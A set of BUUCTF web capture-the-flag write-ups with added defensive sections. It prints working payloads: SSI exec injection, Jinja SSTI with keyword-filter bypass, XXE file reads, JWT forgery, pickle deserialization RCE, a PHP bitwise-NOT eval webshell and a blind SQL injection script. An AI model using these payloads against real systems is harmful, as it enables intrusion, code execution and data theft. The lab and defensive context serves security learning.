# BUUCTF Writeups, Part 6
[toc]
## [BJDCTF2020]EasySearch

1. Visit the page.
2. Scan directories and find `index.php.swp` (it is not easy to hit by scanning).
3. The leaked source shows that the admin check compares a fixed value against the first 6 characters of `md5(password)`. Brute-force it with an MD5 script:
```python
# -*- coding: utf-8 -*-
# Python 3 version of the usual "md5 prefix" brute-force script.
import multiprocessing
import hashlib
import random
import string

CHARS = string.ascii_letters + string.digits


def cmp_md5(substr, stop_event, str_len, start=0, size=20):
    """Generate random strings until one whose MD5 hex digest carries
    `substr` at offset `start` is found, then tell the other workers to stop."""
    while not stop_event.is_set():
        rnds = ''.join(random.choice(CHARS) for _ in range(size))
        value = hashlib.md5(rnds.encode()).hexdigest()
        if value[start:start + str_len] == substr:
            print(rnds)
            stop_event.set()
        '''
        # double-MD5 collision variant
        md5 = hashlib.md5(value.encode())
        if md5.hexdigest()[start:start + str_len] == substr:
            print(rnds + "=>" + value + "=>" + md5.hexdigest() + "\n")
            stop_event.set()
        '''


if __name__ == '__main__':
    substr = '6d0bc1'   # target prefix from the leaked source
    str_len = 6
    cpus = multiprocessing.cpu_count()
    stop_event = multiprocessing.Event()
    processes = [multiprocessing.Process(target=cmp_md5,
                                         args=(substr, stop_event, str_len))
                 for _ in range(cpus)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()
```
4. Capture the login request and send it; the response reveals a path whose file extension is `.shtml`.
5. A quick search (Baidu) shows that `.shtml` pages can be subject to SSI injection:

```html
<!--#exec cmd="id" -->
```

6. The flag is in the web root directory:

```html
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2 " -->
```
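An added defender-side note, not part of the original writeup: `<!--#exec cmd=...-->` only runs when the server enables SSI with exec. Apache httpd configuration with the weak setting next to the hardened one (the directory path is assumed):

```apache
# Weak: Includes lets <!--#exec cmd="..."--> run in every .shtml page
<Directory "/var/www/html">
    Options +Includes
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</Directory>

# Hardened: SSI stays available for #include of files, but #exec is refused
<Directory "/var/www/html">
    Options +IncludesNOEXEC
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</Directory>
```

Either way, user-controlled text must never be written into a file that the INCLUDES filter processes; the directive is the sink, the reflected input is the bug.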
## [GYCTF2020]FlaskApp

1. Visit the page.
2. The hint page says "failure is the mother of success", so we probably need to make something fail.
3. Try the encrypt and decrypt functions. Entering `1` on the decrypt page makes the page throw an error, and the traceback reveals `render_template_string(tmp)`: there is SSTI, and there is also a WAF.
4. Verify it.
5. Read the source (`app.py`) with the payload below; the WAF filters a list of commonly used keywords:

```jinja
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}
```

```python
def waf(str):
    black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]
    for x in black_list :
        if x in str.lower() :
            return 1
```

6. Build a payload that bypasses the filter by splitting the keywords with string concatenation:

```jinja
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
```

7. Read `this_is_the_flag.txt`:

```jinja
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}
```
## [BSidesCF 2019]Futurella

1. Visit the page; it shows a string of unreadable glyphs.
2. It cannot be read, so right-click and view the source: the flag is right there.
## [NCTF2019]True XML cookbook

1. Visit the page.
2. Capture the login request with Burp; the body is XML.
3. First read `/etc/passwd`: the XXE vulnerability is confirmed.
4. Try to read the flag; it keeps erroring.
5. Use the `php://filter` wrapper to read the source and take a look; nothing useful:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=doLogin.php">]>
<user><username>&xxe;</username><password>admin</password></user>
```

6. Stuck here. After looking things up, it turns out the next step is probing the internal network; `/proc/net/arp` gives the 10.0.44.2 subnet:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///proc/net/arp">]>
<user><username>&xxe;</username><password>admin</password></user>
```

7. Brute-force the hosts in that subnet with Burp.
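An added example, not from the original writeup, of how the login endpoint could refuse these XML payloads before parsing: a stdlib-only pre-scan with expat that aborts on any DOCTYPE or entity declaration, followed by a normal ElementTree parse. The two sample documents (a benign login and the `/proc/net/arp` payload from step 6) are constructed for the example; `reject_doctype_and_entities`, `parse_login` and `is_safe_login` are names chosen here.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when a document carries a DOCTYPE or an entity declaration."""


def reject_doctype_and_entities(xml_bytes):
    """Pre-scan with expat and abort on the first DOCTYPE or ENTITY declaration.
    SYSTEM entities are the mechanism behind the file:///, php://filter and
    /proc/net/arp reads above, so the whole feature is refused, not a URL list."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError("DOCTYPE not allowed: %s" % name)

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError("entity declaration not allowed: %s" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)   # exceptions raised in handlers propagate here


def parse_login(xml_bytes):
    """Return (username, password), or raise UnsafeXMLError / ET.ParseError."""
    reject_doctype_and_entities(xml_bytes)
    root = ET.fromstring(xml_bytes)
    return root.findtext("username"), root.findtext("password")


def is_safe_login(xml_bytes):
    try:
        reject_doctype_and_entities(xml_bytes)
        return True
    except UnsafeXMLError:
        return False


# Constructed inputs: a normal login and the /proc/net/arp payload from step 6.
BENIGN_XML = (b'<?xml version="1.0" encoding="utf-8"?>'
              b'<user><username>alice</username><password>admin</password></user>')
XXE_XML = (b'<?xml version="1.0" encoding="utf-8"?>\n<!DOCTYPE foo [\n'
           b'<!ENTITY xxe SYSTEM "file:///proc/net/arp">]>\n'
           b'<user><username>&xxe;</username><password>admin</password></user>')
```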
## [CISCN2019 华北赛区 Day1 Web2]ikun

1. Visit the page; the hint says you need to buy lv6.
2. Register an account and log in.
3. Use a script to find which shop page lv6 is on:

```python
import requests

url = 'http://ce6a792f-b7a8-4e42-a0d7-57103fdbd4b8.node4.buuoj.cn:81/shop?page={0}'
for i in range(1, 2000):
    response = requests.get(url.format(i))
    if "lv6.png" in response.text:
        print(i)
        break
```

4. lv6 is too expensive, so intercept the purchase request.
5. Change the trailing discount field to a very large value (not 0; 0 simply errors). This returns a new address, with a hint that only admin may access it.
6. Next comes privilege escalation: the cookie carries a JWT, so the JWT has to be cracked and `username` changed to `admin`.
7. Use c-jwt-cracker to recover the signing secret.
8. Use https://jwt.io/ to sign the modified token.
9. Modify the cookie.
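An added example (not the challenge's code) of the verification a server should do for an HS256 cookie like this one: refuse secrets short enough for a tool like c-jwt-cracker to brute-force, pin the algorithm instead of trusting the token's `alg`, and compare the MAC in constant time, so a token whose `username` was edited to `admin` without the secret is rejected. Stdlib only; `DEMO_SECRET`, `sign_hs256`, `verify_hs256` and `tampered_username` are names chosen for this example.

```python
import base64
import hashlib
import hmac
import json
import secrets

MIN_SECRET_BYTES = 32                  # 256-bit random key, not a dictionary word
DEMO_SECRET = secrets.token_bytes(32)  # constructed for this example


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, secret):
    """Issue a JWT; refuse secrets that an offline cracker could recover."""
    if len(secret) < MIN_SECRET_BYTES:
        raise ValueError("HS256 secret must be at least %d bytes" % MIN_SECRET_BYTES)
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url_encode(json.dumps(claims).encode())
    mac = hmac.new(secret, ("%s.%s" % (header, body)).encode(), hashlib.sha256).digest()
    return "%s.%s.%s" % (header, body, _b64url_encode(mac))


def verify_hs256(token, secret):
    """Return the claims if the signature is valid, otherwise None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:                 # malformed token, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None                    # algorithm is pinned server-side
    expected = hmac.new(secret, ("%s.%s" % (header_b64, body_b64)).encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(_b64url_decode(body_b64))


def tampered_username(token, new_name):
    """Re-encode the payload with another username but keep the old signature,
    i.e. what editing the claims on jwt.io without the secret produces."""
    header_b64, body_b64, sig_b64 = token.split(".")
    claims = json.loads(_b64url_decode(body_b64))
    claims["username"] = new_name
    return "%s.%s.%s" % (header_b64, _b64url_encode(json.dumps(claims).encode()), sig_b64)
```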
10. Right-click to view the source; a backup file is found.
11. Audit the code: `Admin.py` contains Python deserialization (pickle), and the result is rendered straight into `form.html`:

```python
def post(self, *args, **kwargs):
    try:
        become = self.get_argument('become')
        p = pickle.loads(urllib.unquote(become))
        return self.render('form.html', res=p, member=1)
    except:
        return self.render('form.html', res='This is Black Technology!', member=0)
```

12. Build payload 1 (Python 2, matching the Python 2 target):

```python
# coding=utf8
import pickle
import urllib
import commands


class payload(object):
    def __reduce__(self):
        return (commands.getoutput, ('cat /flag.txt',))


a = payload()
print urllib.quote(pickle.dumps(a))
```

13. Payload 2:

```python
# coding=utf8
import pickle
import urllib


class payload(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt').read()",))


a = payload()
print urllib.quote(pickle.dumps(a))
```
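An added example, not from `Admin.py`, of why `pickle.loads` on a request parameter cannot be fixed by filtering strings and how a restricted unpickler refuses the `__reduce__` gadget the payloads above rely on. `RestrictedUnpickler`, `restricted_loads`, `EvalGadget` and `demo` are names chosen here; the gadget calls `eval` on a harmless expression. The real fix for a `become` parameter is a data format without code references, such as JSON.

```python
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve GLOBAL/STACK_GLOBAL references only against a fixed whitelist.
    Anything else (builtins.eval, commands.getoutput, os.system, ...) is
    refused before the REDUCE opcode gets a chance to call it."""
    SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}

    def find_class(self, module, name):
        if (module, name) in self.SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class EvalGadget(object):
    """Same shape as the payload classes above, with a harmless expression."""
    def __reduce__(self):
        return (eval, ("1+1",))


def demo():
    """Return (value of the benign pickle, whether the gadget was blocked)."""
    benign = pickle.dumps({"member": 1, "name": "user1"})   # constructed input
    hostile = pickle.dumps(EvalGadget())
    assert pickle.loads(hostile) == 2   # plain pickle.loads executes the call
    value = restricted_loads(benign)    # plain data contains no GLOBAL opcode
    try:
        restricted_loads(hostile)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return value, blocked
```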
## [MRCTF2020]套娃

1. Visit the page.
2. Right-click to view the source:

```php
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
```
3. Use the PHP behaviour that converts certain characters in parameter names to `_` to get past the first `if`:

| User input | Decoded PHP | Variable name |
|---|---|---|
| `%20foo_bar%00` | `foo_bar` | `foo_bar` |
| `foo%20bar%00` | `foo bar` | `foo_bar` |
| `foo%5bbar` | `foo[bar` | `foo_bar` |
4. The second `if` is bypassed with a newline, `%0a` (without the `D` modifier, `$` also matches just before a trailing newline).
5. Visit `secrettw.php`; it says the request must be local.
6. Modifying request headers does nothing. View the source: there is a comment that turns out to be JSFuck; run it in the browser console and it hints that a parameter must be sent via POST.
7. Send any parameter and the source is returned.
8. Audit the code: it calls `file_get_contents`, so the goal is to read `flag.php`. There are two preconditions: `ip === '127.0.0.1'` and the parameter `2333` `=== 'todat is a happy day'`. The first is met with a `Client-IP: 127.0.0.1` header, the second via `php://input`.
9. There is also an encoding step; write its inverse:

```php
<?php
function unchange($v){
    $re = '';
    for($i=0;$i<strlen($v);$i++){
        $re .= chr ( ord ($v[$i]) - $i*2 );
    }
    return $re;
}
$b = unchange('flag.php');
echo base64_encode($b);
?>
```

10. Get the flag.
## [极客大挑战 2019]RCE ME

1. Visit the page.
2. Letters and digits are blocked; bypass with bitwise NOT (`~`). First call `phpinfo`: many functions are disabled.

```
?code=(~%8F%97%8F%96%91%99%90)();
```

3. Build the shell:

```php
<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "\n";
$c='(eval($_POST[1]))';
$d=urlencode(~$c);
echo $d;
?>
```

```
/?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6);
```

4. `readflag` in the root directory has to be executed, but there is no permission to do so.
5. That restriction is bypassed with an AntSword (蚁剑) plugin.
## [BSidesCF 2019]Kookie

1. Visit the page; it says you need to log in as admin, and a cookie account is provided.
2. Log in with that account and capture the request; the cookie contains a `username` field.
3. Change it to `admin`.
## [WUSTCTF2020]颜值成绩查询

1. Visit the page; the input box looks like a SQL injection point.
2. Enter `1/**/and/**/1=1/**/%23`: the page is normal. Spaces are filtered, hence the `/**/` comments.
3. Enter `1/**/and/**/1=2/**/%23`: the query fails.
4. Payload: when the ASCII comparison `> 100` holds, the score shown is 100:

```
?stunum=1/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),1,1))>100/**/%23
```

With `> 200` the page says the score does not exist.

5. Boolean-based blind injection; write the exp:

```python
import requests
import time

url = 'http://4726a7f2-6cf5-40a8-a0e0-0dc1360449ae.node4.buuoj.cn:81/?stunum='
flag = ''


def payload(i, j):
    # dump table names
    # payload = "1/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))>{1}/**/%23".format(i, j)
    # dump column names
    # payload = "1/**/and/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{0},1))>{1}/**/%23".format(i, j)
    # dump the field values
    payload = "1/**/and/**/ascii(substr((select/**/group_concat(flag,'-',value)/**/from/**/flag),{0},1))>{1}/**/%23".format(i, j)
    r = requests.get(url + payload)
    if "your score is: 100" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        # binary search for the ASCII value of character i
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if f == 127 or f == 31:
            break
        # print(f)
        time.sleep(1)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)
```
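An added detection example, not part of the writeup: the exp above issues one request per bisection step, which leaves an obvious trace in the access log. This stdlib-only script URL-decodes every query parameter, folds the `/**/` comments back into spaces (the space-filter evasion the payloads depend on) and flags the boolean/blind patterns. The log lines are constructed for the example; `flag_blind_sqli` and `normalize` are names chosen here.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines modelled on what the exp script above sends.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?stunum=1/**/and/**/1=1/**/%23 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?stunum=1/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),1,1))>100/**/%23 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?stunum=42 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) ')
# Signatures of the technique used here: tautology tests, ascii()/substr()
# probes behind and/or, and reads of the information_schema catalogue.
BLIND_SQLI_RE = re.compile(
    r"\b(and|or)\s+\d+\s*=\s*\d+"
    r"|\b(and|or)\s+(ascii|substr|substring|length|sleep|benchmark)\s*\("
    r"|information_schema",
    re.I,
)


def normalize(value):
    """URL-decode twice (double encoding) and fold /**/ comments into spaces,
    so the keywords hidden by the space-filter evasion become visible again."""
    text = unquote(unquote(value))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip()


def flag_blind_sqli(log_text):
    """Return (client_ip, parameter, normalized_value) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                cleaned = normalize(raw)
                if BLIND_SQLI_RE.search(cleaned):
                    hits.append((m.group("ip"), name, cleaned))
    return hits
```

Detection is the second line of defence; the endpoint itself should bind `stunum` as a parameter of a prepared statement rather than filtering spaces out of it.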
## [GWCTF 2019]枯燥的抽奖

1. Visit the page; it asks you to guess the characters.
2. Right-click to view the source; `check.php` is found.
3. Visit it.
4. This is the PHP pseudo-random number (`mt_rand` seed) weakness. Convert the known leading characters into the input format that php_mt_seed expects:

```python
str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2 = 'Rla1i9br4y'   # the characters revealed by check.php
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            # one "value value min max" group per output of mt_rand(0, 61)
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)
```

5. Run php_mt_seed on that output to recover the seed.
6. Reseed with the recovered value and regenerate the string to get the flag:

```php
<?php
mt_srand('54811715');
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
echo $str;
?>
```